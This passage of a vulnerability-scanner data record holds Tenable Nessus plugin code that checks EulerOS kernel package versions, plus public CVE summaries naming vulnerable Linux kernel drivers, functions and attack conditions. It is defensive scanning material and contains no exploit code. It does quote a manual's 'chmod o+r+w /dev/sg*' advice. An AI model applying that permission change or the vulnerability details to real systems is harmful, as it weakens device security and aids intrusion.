obtain read and write\n permissions on kernel physical pages, which can\n possibly result in a privilege\n escalation.(CVE-2019-18675)\n\n - In the AppleTalk subsystem in the Linux kernel before\n 5.1, there is a potential NULL pointer dereference\n because register_snap_client may return NULL. This will\n lead to denial of service in net/appletalk/aarp.c and\n net/appletalk/ddp.c, as demonstrated by\n unregister_snap_client, aka\n CID-9804501fa122.(CVE-2019-19227)\n\n - In the Linux kernel before 5.3.7, there is a\n use-after-free bug that can be caused by a malicious\n USB device in the drivers/usb/misc/adutux.c driver, aka\n CID-44efc269db79.(CVE-2019-19523)\n\n - In the Linux kernel before 5.3.12, there is a\n use-after-free bug that can be caused by a malicious\n USB device in the drivers/input/ff-memless.c driver,\n aka CID-fa3a5a1880c9.(CVE-2019-19524)\n\n - In the Linux kernel before 5.2.10, there is a\n use-after-free bug that can be caused by a malicious\n USB device in the drivers/hid/usbhid/hiddev.c driver,\n aka CID-9c09b214f30e.(CVE-2019-19527)\n\n - In the Linux kernel before 5.3.7, there is a\n use-after-free bug that can be caused by a malicious\n USB device in the drivers/usb/misc/iowarrior.c driver,\n aka CID-edc4746f253d.(CVE-2019-19528)\n\n - In the Linux kernel before 5.2.10, there is a\n use-after-free bug that can be caused by a malicious\n USB device in the drivers/usb/class/cdc-acm.c driver,\n aka CID-c52873e5a1ef.(CVE-2019-19530)\n\n - In the Linux kernel before 5.2.9, there is a\n use-after-free bug that can be caused by a malicious\n USB device in the drivers/usb/misc/yurex.c driver, aka\n CID-fc05481b2fca.(CVE-2019-19531)\n\n - In the Linux kernel before 5.3.4, there is an info-leak\n bug that can be caused by a malicious USB device in the\n drivers/media/usb/ttusb-dec/ttusb_dec.c driver, aka\n CID-a10feaf8c464.(CVE-2019-19533)\n\n - In the Linux kernel before 5.3.11, there is an\n info-leak bug that can be caused by a malicious USB\n device in the\n drivers/net/can/usb/peak_usb/pcan_usb_core.c driver,\n aka CID-f7a1337f0d29.(CVE-2019-19534)\n\n - In the Linux kernel before 5.2.10, there is a race\n condition bug that can be caused by a malicious USB\n device in the USB character device driver layer, aka\n CID-303911cfc5b9. This affects\n drivers/usb/core/file.c.(CVE-2019-19536)\n\n - In the Linux kernel before 5.2.10, there is a race\n condition bug that can be caused by a malicious USB\n device in the USB character device driver layer, aka\n CID-303911cfc5b9. This affects\n drivers/usb/core/file.c.(CVE-2019-19537)\n\n - The xen_biovec_phys_mergeable function in\n drivers/xen/biomerge.c in Xen might allow local OS\n guest users to corrupt block device data streams and\n consequently obtain sensitive memory information, cause\n a denial of service, or gain host OS privileges by\n leveraging incorrect block IO merge-ability\n calculation.(CVE-2017-12134)\n\n - In ashmem_ioctl of ashmem.c, there is an out-of-bounds\n write due to insufficient locking when accessing asma.\n This could lead to a local elevation of privilege\n enabling code execution as a privileged process with no\n additional execution privileges needed. User\n interaction is not needed for exploitation. Product:\n Android. Versions: Android kernel. Android ID:\n A-66954097.(CVE-2017-13216)\n\n - The acpi_ds_create_operands() function in\n drivers/acpi/acpica/dsutils.c in the Linux kernel\n through 4.12.9 does not flush the operand cache and\n causes a kernel stack dump, which allows local users to\n obtain sensitive information from kernel memory and\n bypass the KASLR protection mechanism (in the kernel\n through 4.9) via a crafted ACPI table.(CVE-2017-13693)\n\n - drivers/net/usb/pegasus.c in the Linux kernel 4.9.x\n before 4.9.11 interacts incorrectly with the\n CONFIG_VMAP_STACK option, which allows local users to\n cause a denial of service (system crash or memory\n corruption) or possibly have unspecified other impact\n by leveraging use of more than one virtual page for a\n DMA scatterlist.(CVE-2017-8068)\n\n - drivers/net/usb/rtl8150.c in the Linux kernel 4.9.x\n before 4.9.11 interacts incorrectly with the\n CONFIG_VMAP_STACK option, which allows local users to\n cause a denial of service (system crash or memory\n corruption) or possibly have unspecified other impact\n by leveraging use of more than one virtual page for a\n DMA scatterlist.(CVE-2017-8069)\n\n - drivers/net/usb/catc.c in the Linux kernel 4.9.x before\n 4.9.11 interacts incorrectly with the CONFIG_VMAP_STACK\n option, which allows local users to cause a denial of\n service (system crash or memory corruption) or possibly\n have unspecified other impact by leveraging use of more\n than one virtual page for a DMA\n scatterlist.(CVE-2017-8070)\n\n - A security flaw was found in the\n chap_server_compute_md5() function in the ISCSI target\n code in the Linux kernel in a way an authentication\n request from an ISCSI initiator is processed. An\n unauthenticated remote attacker can cause a stack\n buffer overflow and smash up to 17 bytes of the stack.\n The attack requires the iSCSI target to be enabled on\n the victim host. Depending on how the target's code was\n built (i.e. depending on a compiler, compile flags and\n hardware architecture) an attack may lead to a system\n crash and thus to a denial-of-service or possibly to a\n non-authorized access to data exported by an iSCSI\n target. Due to the nature of the flaw, privilege\n escalation cannot be fully ruled out, although we\n believe it is highly unlikely. Kernel versions 4.18.x,\n 4.14.x and 3.10.x are believed to be\n vulnerable.(CVE-2018-14633)\n\n - A flaw was found in the Linux kernel. A heap based\n buffer overflow in mwifiex_uap_parse_tail_ies function\n in drivers/net/wireless/marvell/mwifiex/ie.c might lead\n to memory corruption and possibly other\n consequences.(CVE-2019-10126)\n\n - An issue was discovered in net/ipv4/sysctl_net_ipv4.c\n in the Linux kernel before 5.0.11. There is a\n net/ipv4/tcp_input.c signed integer overflow in\n tcp_ack_update_rtt() when userspace writes a very large\n integer to /proc/sys/net/ipv4/tcp_min_rtt_wlen, leading\n to a denial of service or possibly unspecified other\n impact, aka CID-19fad20d15a6.(CVE-2019-18805)\n\n - A memory leak in the ql_alloc_large_buffers() function\n in drivers/net/ethernet/qlogic/qla3xxx.c in the Linux\n kernel before 5.3.5 allows local users to cause a\n denial of service (memory consumption) by triggering\n pci_dma_mapping_error() failures, aka\n CID-1acb8f2a7a9f.(CVE-2019-18806)\n\n - A use-after-free in binder.c allows an elevation of\n privilege from an application to the Linux Kernel. No\n user interaction is required to exploit this\n vulnerability, however exploitation does require either\n the installation of a malicious local application or a\n separate vulnerability in a network facing\n application.Product: AndroidAndroid ID:\n A-141720095(CVE-2019-2215)\n\n - arch/arm/mm/dma-mapping.c in the Linux kernel before\n 3.13 on ARM platforms, as used in Android before\n 2016-08-05 on Nexus 5 and 7 (2013) devices, does not\n prevent executable DMA mappings, which might allow\n local users to gain privileges via a crafted\n application, aka Android internal bug 28803642 and\n Qualcomm internal bug CR642735.(CVE-2014-9888)\n\n - A memory leak in the cx23888_ir_probe() function in\n drivers/media/pci/cx23885/cx23888-ir.c in the Linux\n kernel through 5.3.11 allows attackers to cause a\n denial of service (memory consumption) by triggering\n kfifo_alloc() failures, aka\n CID-a7b2df76b42b.(CVE-2019-19054)\n\n - A memory leak in the mwifiex_pcie_alloc_cmdrsp_buf()\n function in drivers/net/wireless/marvell/mwifiex/pcie.c\n in the Linux kernel through 5.3.11 allows attackers to\n cause a denial of service (memory consumption) by\n triggering mwifiex_map_pci_memory() failures, aka\n CID-db8fd2cde932.(CVE-2019-19056)\n\n - Two memory leaks in the mwifiex_pcie_init_evt_ring()\n function in drivers/net/wireless/marvell/mwifiex/pcie.c\n in the Linux kernel through 5.3.11 allow attackers to\n cause a denial of service (memory consumption) by\n triggering mwifiex_map_pci_memory() failures, aka\n CID-d10dcb615c8e.(CVE-2019-19057)\n\n - A memory leak in the adis_update_scan_mode() function\n in drivers/iio/imu/adis_buffer.c in the Linux kernel\n before 5.3.9 allows attackers to cause a denial of\n service (memory consumption), aka\n CID-ab612b1daf41.(CVE-2019-19060)\n\n - A memory leak in the crypto_report() function in\n crypto/crypto_user_base.c in the Linux kernel through\n 5.3.11 allows attackers to cause a denial of service\n (memory consumption) by triggering(CVE-2019-19062)\n\n - Two memory leaks in the rtl_usb_probe() function in\n drivers/net/wireless/realtek/rtlwifi/usb.c in the Linux\n kernel through 5.3.11 allow attackers to cause a denial\n of service (memory consumption), aka\n CID-3f9361695113.(CVE-2019-19063)\n\n - A memory leak in the bfad_im_get_stats() function in\n drivers/scsi/bfa/bfad_attr.c in the Linux kernel\n through 5.3.11 allows attackers to cause a denial of\n service (memory consumption) by triggering\n bfa_port_get_stats() failures, aka\n CID-0e62395da2bd.(CVE-2019-19066)\n\n - Memory leaks in\n drivers/net/wireless/ath/ath9k/htc_hst.c in the Linux\n kernel through 5.3.11 allow attackers to cause a denial\n of service (memory consumption) by triggering\n wait_for_completion_timeout() failures. This affects\n the htc_config_pipe_credits() function, the\n htc_setup_complete() function, and the\n htc_connect_service() function, aka\n CID-853acf7caf10.(CVE-2019-19073)\n\n - A memory leak in the ath9k_wmi_cmd() function in\n drivers/net/wireless/ath/ath9k/wmi.c in the Linux\n kernel through 5.3.11 allows attackers to cause a\n denial of service (memory consumption), aka\n CID-728c1e2a05e4.(CVE-2019-19074)\n\n - drivers/net/fjes/fjes_main.c in the Linux kernel 5.2.14\n does not check the alloc_workqueue return value,\n leading to a NULL pointer dereference.(CVE-2019-16231)\n\n - drivers/net/wireless/marvell/libertas/if_sdio.c in the\n Linux kernel 5.2.14 does not check the alloc_workqueue\n return value, leading to a NULL pointer\n dereference.(CVE-2019-16232)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-1396\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1f67439f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-14901\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2019-18805\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Android Binder Use-After-Free Exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(3)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-514.44.5.10.h254\",\n \"kernel-debuginfo-3.10.0-514.44.5.10.h254\",\n \"kernel-debuginfo-common-x86_64-3.10.0-514.44.5.10.h254\",\n \"kernel-devel-3.10.0-514.44.5.10.h254\",\n \"kernel-headers-3.10.0-514.44.5.10.h254\",\n \"kernel-tools-3.10.0-514.44.5.10.h254\",\n \"kernel-tools-libs-3.10.0-514.44.5.10.h254\",\n \"perf-3.10.0-514.44.5.10.h254\",\n \"python-perf-3.10.0-514.44.5.10.h254\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"3\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:02:36", "description": "According to the versions of the kernel packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system:\n memory allocation, process allocation, device input and output, etc.Security Fix(es):In the Linux kernel before 5.5.8, get_raw_socket in drivers/vhost/ net.c lacks validation of an sk_family field, which might allow attackers to trigger kernel stack corruption via crafted system calls.(CVE-2020-10942)In the Linux kernel 5.0.21, a setxattr operation, after a mount of a crafted ext4 image, can cause a slab-out-of-bounds write access because of an ext4_xattr_set_entry use-after-free in fs/ext4/xattr.c when a large old_size value is used in a memset call.(CVE-2019-19319)In kernel/compat.c in the Linux kernel before 3.17, as used in Google Chrome OS and other products, there is a possible out-of-bounds read. restart_syscall uses uninitialized data when restarting compat_sys_nanosleep. NOTE: this is disputed because the code path is unreachable.(CVE-2014-3180)In the Linux kernel 5.4.0-rc2, there is a use-after-free (read) in the __blk_add_trace function in kernel/trace/blktrace.c (which is used to fill out a blk_io_trace structure and place it in a per-cpu sub-buffer).(CVE-2019-19768)There is a use-after-free vulnerability in the Linux kernel through 5.5.2 in the vc_do_resize function in drivers/tty/vt/vt.c.(CVE-2020-8647)There is a use-after-free vulnerability in the Linux kernel through 5.5.2 in the vgacon_invert_region function in drivers/video/console/vgacon.c.(CVE-2020-8649)drivers/g pu/drm/radeon/radeon_display.c in the Linux kernel 5.2.14 does not check the alloc_workqueue return value, leading to a NULL pointer dereference. NOTE: A third-party software maintainer states that the work queue allocation is happening during device initialization, which for a graphics card occurs during boot. It is not attacker controllable and OOM at that time is highly unlikely.(CVE-2019-16230)There is a use-after-free vulnerability in the Linux kernel through 5.5.2 in the n_tty_receive_buf_common function in drivers/tty/ n_tty.c.(CVE-2020-8648)A flaw was discovered in the way that the KVM hypervisor handled instruction emulation for an L2 guest when nested virtualisation is enabled. Under some circumstances, an L2 guest may trick the L0 guest into accessing sensitive L1 resources that should be inaccessible to the L2 guest.(CVE-2020-2732)An issue was discovered in the Linux kernel through 5.5.6. set_fdc in drivers/block/floppy.c leads to a wait_til_ready out-of-bounds read because the FDC index is not checked for errors before assigning it, aka CID-2e90ca68b0d2.(CVE-2020-9383)ext4_protect_reserved_i node in fs/ext4/block_validity.c in the Linux kernel through 5.5.3 allows attackers to cause a denial of service (soft lockup) via a crafted journal size.(CVE-2020-8992)Wi-Fi Protected Access (WPA and WPA2) allows reinstallation of the Group Temporal Key (GTK) during the group key handshake, allowing an attacker within radio range to replay frames from access points to clients.(CVE-2017-13080)Linux Kernel version 3.18 to 4.16 incorrectly handles an SG_IO ioctl on /dev/sg0 with dxfer_direction=SG_DXFER_FROM_DEV and an empty 6-byte cmdp. This may lead to copying up to 1000 kernel heap pages to the userspace. This has been fixed upstream in https://github.com/torvalds/linux/commit/a45b599ad808c3 c982fdcdc12b0b8611c2f92824 already. The problem has limited scope, as users don't usually have permissions to access SCSI devices. On the other hand, e.g. the Nero user manual suggests doing `chmod o+r+w /dev/sg*` to make the devices accessible. NOTE: third parties dispute the relevance of this report, noting that the requirement for an attacker to have both the CAP_SYS_ADMIN and CAP_SYS_RAWIO capabilities makes it 'virtually impossible to exploit.'(CVE-2018-1000204)The Linux kernel through 5.3.13 has a start_offset+size Integer Overflow in cpia2_remap_buffer in drivers/media/usb/cpia2/cpia2_core.c because cpia2 has its own mmap implementation. This allows local users (with /dev/video0 access) to obtain read and write permissions on kernel physical pages, which can possibly result in a privilege escalation.(CVE-2019-18675)arch/x86/kvm/emulate.c in the Linux kernel before 4.8.12 does not properly initialize Code Segment (CS) in certain error cases, which allows local users to obtain sensitive information from kernel stack memory via a crafted application.(CVE-2016-9756)Double free vulnerability in drivers/ net/usb/cdc_ncm.c in the Linux kernel before 4.5 allows physically proximate attackers to cause a denial of service (system crash) or possibly have unspecified other impact by inserting a USB device with an invalid USB descriptor.(CVE-2016-3951)Linux Kernel contains an out-of-bounds read flaw in the asn1_ber_decoder() function in lib/asn1_decoder.c that is triggered when decoding ASN.1 data. This may allow a remote attacker to disclose potentially sensitive memory contents.(CVE-2018-9383)Linux Kernel contains a flaw in the ip6_setup_cork() function in net/ipv6/ip6_output.c that is triggered when handling too small IPv6 MTU sizes. This may allow a local attacker to cause a crash or potentially gain elevated privileges.(CVE-2018-9389)In the Android kernel in the video driver there is a use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.(CVE-2019-9458)An out-of-bounds memory write issue was found in the Linux Kernel, version 3.13 through 5.4, in the way the Linux kernel's KVM hypervisor handled the 'KVM_GET_EMULATED_CPUID' ioctl(2) request to get CPUID features emulated by the KVM hypervisor. A user or process able to access the '/dev/kvm' device could use this flaw to crash the system, resulting in a denial of service.(CVE-2019-19332)kernel/sched/fair.c in the Linux kernel before 5.3.9, when cpu.cfs_quota_us is used (e.g., with Kubernetes), allows attackers to cause a denial of service against non-cpu-bound applications by generating a workload that triggers unwanted slice expiration, aka CID-de53fd7aedb1. (In other words, although this slice expiration would typically be seen with benign workloads, it is possible that an attacker could calculate how many stray requests are required to force an entire Kubernetes cluster into a low-performance state caused by slice expiration, and ensure that a DDoS attack sent that number of stray requests. An attack does not affect the stability of the kernel it only causes mismanagement of application execution.)(CVE-2019-19922)An exploitable denial-of-service vulnerability exists in the Linux kernel prior to mainline 5.3. An attacker could exploit this vulnerability by triggering AP to send IAPP location updates for stations before the required authentication process has completed. This could lead to different denial-of-service scenarios, either by causing CAM table attacks, or by leading to traffic flapping if faking already existing clients in other nearby APs of the same wireless infrastructure. An attacker can forge Authentication and Association Request packets to trigger this vulnerability.(CVE-2019-5108)A heap-based buffer overflow vulnerability was found in the Linux kernel, version kernel-2.6.32, in Marvell WiFi chip driver. A remote attacker could cause a denial of service (system crash) or, possibly execute arbitrary code, when the lbs_ibss_join_existing function is called after a STA connects to an AP.(CVE-2019-14896)A stack-based buffer overflow was found in the Linux kernel, version kernel-2.6.32, in Marvell WiFi chip driver. An attacker is able to cause a denial of service (system crash) or, possibly execute arbitrary code, when a STA works in IBSS mode (allows connecting stations together without the use of an AP) and connects to another STA.(CVE-2019-14897)In the Linux kernel through 5.4.6, there is a NULL pointer dereference in drivers/scsi/libsas/sas_discover.c because of mishandling of port disconnection during discovery, related to a PHY down race condition, aka CID-f70267f379b5.(CVE-2019-19965)In the Linux kernel before 5.1.6, there is a use-after-free in cpia2_exit() in drivers/media/usb/cpia2/cpia2_v4l.c that will cause denial of service, aka CID-dea37a972655.(CVE-2019-19966)In the Linux kernel before 5.1, there is a memory leak in\n __feat_register_sp() in net/dccp/feat.c, which may cause denial of service, aka CID-1d3ff0950e2b.(CVE-2019-20096)In the Linux kernel before 5.0.6, there is a NULL pointer dereference in drop_sysctl_table() in fs/proc/proc_sysctl.c, related to put_links, aka CID-23da9588037e.(CVE-2019-20054)drivers/ net/usb/pegasus.c in the Linux kernel 4.9.x before 4.9.11 interacts incorrectly with the CONFIG_VMAP_STACK option, which allows local users to cause a denial of service (system crash or memory corruption) or possibly have unspecified other impact by leveraging use of more than one virtual page for a DMA scatterlist.(CVE-2017-8068)A heap-based buffer overflow was discovered in the Linux kernel, all versions 3.x.x and 4.x.x before 4.18.0, in Marvell WiFi chip driver.\n The flaw could occur when the station attempts a connection negotiation during the handling of the remote devices country settings. This could allow the remote device to cause a denial of service (system crash) or possibly execute arbitrary code.(CVE-2019-14895)The acpi_ds_create_operands() function in drivers/acpi/acpica/dsutils.c in the Linux kernel through 4.12.9 does not flush the operand cache and causes a kernel stack dump, which allows local users to obtain sensitive information from kernel memory and bypass the KASLR protection mechanism (in the kernel through 4.9) via a crafted ACPI table.(CVE-2017-13693)Linux kernel CIFS implementation, version 4.9.0 is vulnerable to a relative paths injection in directory entry lists.(CVE-2019-10220)A heap overflow flaw was found in the Linux kernel, all versions 3.x.x and 4.x.x before 4.18.0, in Marvell WiFi chip driver. The vulnerability allows a remote attacker to cause a system crash, resulting in a denial of service, or execute arbitrary code. The highest threat with this vulnerability is with the availability of the system. If code execution occurs, the code will run with the permissions of root. This will affect both confidentiality and integrity of files on the system.(CVE-2019-14901)In the AppleTalk subsystem in the Linux kernel before 5.1, there is a potential NULL pointer dereference because register_snap_client may return NULL. This will lead to denial of service in net/appletalk/aarp.c and net/appletalk/ddp.c, as demonstrated by unregister_snap_client, aka CID-9804501fa122.(CVE-2019-19227)In the Linux kernel before 5.2.10, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/usb/class/cdc-acm.c driver, aka CID-c52873e5a1ef.(CVE-2019-19530)In the Linux kernel before 5.3.9, there are multiple out-of-bounds write bugs that can be caused by a malicious USB device in the Linux kernel HID drivers, aka CID-d9d4b1e46d95.\n This affects drivers/hid/hid-axff.c, drivers/hid/hid-dr.c, drivers/hid/hid-emsff.c, drivers/hid/hid-gaff.c, drivers/hid/hid-holtekff.c, drivers/hid/hid-lg2ff.c, drivers/hid/hid-lg3ff.c, drivers/hid/hid-lg4ff.c, drivers/hid/hid-lgff.c, drivers/hid/hid-logitech-hidpp.c, drivers/hid/hid-microsoft.c, drivers/hid/hid-sony.c, drivers/hid/hid-tmff.c, and drivers/hid/hid-zpff.c.(CVE-2019-19532)A use-after-free in binder.c allows an elevation of privilege from an application to the Linux Kernel. No user interaction is required to exploit this vulnerability, however exploitation does require either the installation of a malicious local application or a separate vulnerability in a network facing application.Product: AndroidAndroid ID: A-141720095(CVE-2019-2215)The do_remount function in fs/ namespace.c in the Linux kernel through 3.16.1 does not maintain the MNT_LOCK_READONLY bit across a remount of a bind mount, which allows local users to bypass an intended read-only restriction and defeat certain sandbox protection mechanisms via a 'mount -o remount' command within a user namespace.(CVE-2014-5206)Multiple integer overflows in the lzo1x_decompress_safe function in lib/lzo/lzo1x_decompress_safe.c in the LZO decompressor in the Linux kernel before 3.15.2 allow context-dependent attackers to cause a denial of service (memory corruption) via a crafted Literal Run.\n NOTE: the author of the LZO algorithms says 'the Linux kernel is *not* affected media hype.'(CVE-2014-4608)The pivot_root implementation in fs/ namespace.c in the Linux kernel through 3.17 does not properly interact with certain locations of a chroot directory, which allows local users to cause a denial of service (mount-tree loop) via . (dot) values in both arguments to the pivot_root system call.(CVE-2014-7970)A security flaw was discovered in nl80211_set_rekey_data() function in the Linux kernel since v3.1-rc1 through v4.13. This function does not check whether the required attributes are present in a netlink request.\n This request can be issued by a user with CAP_NET_ADMIN privilege and may result in NULL dereference and a system crash.(CVE-2017-12153)arch/x86/kernel/entry_32.S in the Linux kernel through 3.15.1 on 32-bit x86 platforms, when syscall auditing is enabled and the sep CPU feature flag is set, allows local users to cause a denial of service (OOPS and system crash) via an invalid syscall number, as demonstrated by number 1000.(CVE-2014-4508)fs/ namespace.c in the Linux kernel through 3.16.1 does not properly restrict clearing MNT_NODEV, MNT_NOSUID, and MNT_NOEXEC and changing MNT_ATIME_MASK during a remount of a bind mount, which allows local users to gain privileges, interfere with backups and auditing on systems that had atime enabled, or cause a denial of service (excessive filesystem updating) on systems that had atime disabled via a 'mount -o remount' command within a user namespace.(CVE-2014-5207)In the Linux kernel before 5.3.7, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/usb/misc/adutux.c driver, aka CID-44efc269db79.(CVE-2019-19523)In the Linux kernel before 5.3.12, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/input/ff-memless.c driver, aka CID-fa3a5a1880c9.(CVE-2019-19524)In the Linux kernel before 5.2.10, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/hid/usbhid/hiddev.c driver, aka CID-9c09b214f30e.(CVE-2019-19527)In the Linux kernel before 5.3.7, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/usb/misc/iowarrior.c driver, aka CID-edc4746f253d.(CVE-2019-19528)In the Linux kernel before 5.2.9, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/usb/misc/yurex.c driver, aka CID-fc05481b2fca.(CVE-2019-19531)In the Linux kernel before 5.3.4, there is an info-leak bug that can be caused by a malicious USB device in the drivers/media/usb/ttusb-dec/ttusb_dec.c driver, aka CID-a10feaf8c464.(CVE-2019-19533)In the Linux kernel before 5.3.11, there is an info-leak bug that can be caused by a malicious USB device in the drivers/ net/can/usb/peak_usb/pcan_usb_core.c driver, aka CID-f7a1337f0d29..(CVE-2019-19534)In the Linux kernel before 5.2.9, there is an info-leak bug that can be caused by a malicious USB device in the drivers/ net/can/usb/peak_usb/pcan_usb_pro.c driver, aka CID-ead16e53c2f0.(CVE-2019-19536)In the Linux kernel before 5.2.10, there is a race condition bug that can be caused by a malicious USB device in the USB character device driver layer, aka CID-303911cfc5b9.\n This affects drivers/usb/core/file.c.(CVE-2019-19537)A memory leak in the cx23888_ir_probe() function in drivers/media/pci/cx23885/cx23888-ir.c in the Linux kernel through 5.3.11 allows attackers to cause a denial of service (memory consumption) by triggering kfifo_alloc() failures, aka CID-a7b2df76b42b.(CVE-2019-19054)A memory leak in the mwifiex_pcie_alloc_cmdrsp_buf() function in drivers/ net/wireless/marvell/mwifiex/pcie.c in the Linux kernel through 5.3.11 allows attackers to cause a denial of service (memory consumption) by triggering mwifiex_map_pci_memory() failures, aka CID-db8fd2cde932.(CVE-2019-19056)Two memory leaks in the mwifiex_pcie_init_evt_ring() function in drivers/ net/wireless/marvell/mwifiex/pcie.c in the Linux kernel through 5.3.11 allow attackers to cause a denial of service (memory consumption) by triggering mwifiex_map_pci_memory() failures, aka CID-d10dcb615c8e.(CVE-2019-19057)A memory leak in the adis_update_scan_mode() function in drivers/iio/imu/adis_buffer.c in the Linux kernel before 5.3.9 allows attackers to cause a denial of service (memory consumption), aka CID-ab612b1daf41.(CVE-2019-19060)A memory leak in the crypto_report() function in crypto/crypto_user_base.c in the Linux kernel through 5.3.11 allows attackers to cause a denial of service (memory consumption) by triggering crypto_report_alg() failures, aka CID-ffdde5932042.(CVE-2019-19062)Two memory leaks in the rtl_usb_probe() function in drivers/ net/wireless/realtek/rtlwifi/usb.c in the Linux kernel through 5.3.11 allow attackers to cause a denial of service (memory consumption), aka CID-3f9361695113.(CVE-2019-19063)A memory leak in the bfad_im_get_stats() function in drivers/scsi/bfa/bfad_attr.c in the Linux kernel through 5.3.11 allows attackers to cause a denial of service (memory consumption) by triggering bfa_port_get_stats() failures, aka CID-0e62395da2bd.(CVE-2019-19066)Memory leaks in drivers/ net/wireless/ath/ath9k/htc_hst.c in the Linux kernel through 5.3.11 allow attackers to cause a denial of service (memory consumption) by triggering wait_for_completion_timeout() failures. This affects the htc_config_pipe_credits() function, the htc_setup_complete() function, and the htc_connect_service() function, aka CID-853acf7caf10.(CVE-2019-19073)A memory leak in the ath9k_wmi_cmd() function in drivers/ net/wireless/ath/ath9k/wmi.c in the Linux kernel through 5.3.11 allows attackers to cause a denial of service (memory consumption), aka CID-728c1e2a05e4.(CVE-2019-19074)An issue was discovered in fs/xfs/xfs_icache.c in the Linux kernel through 4.17.3. There is a NULL pointer dereference and panic in lookup_slow() on a NULL inode->i_ops pointer when doing pathwalks on a corrupted xfs image. This occurs because of a lack of proper validation that cached inodes are free during allocation.(CVE-2018-13093)An issue was discovered in 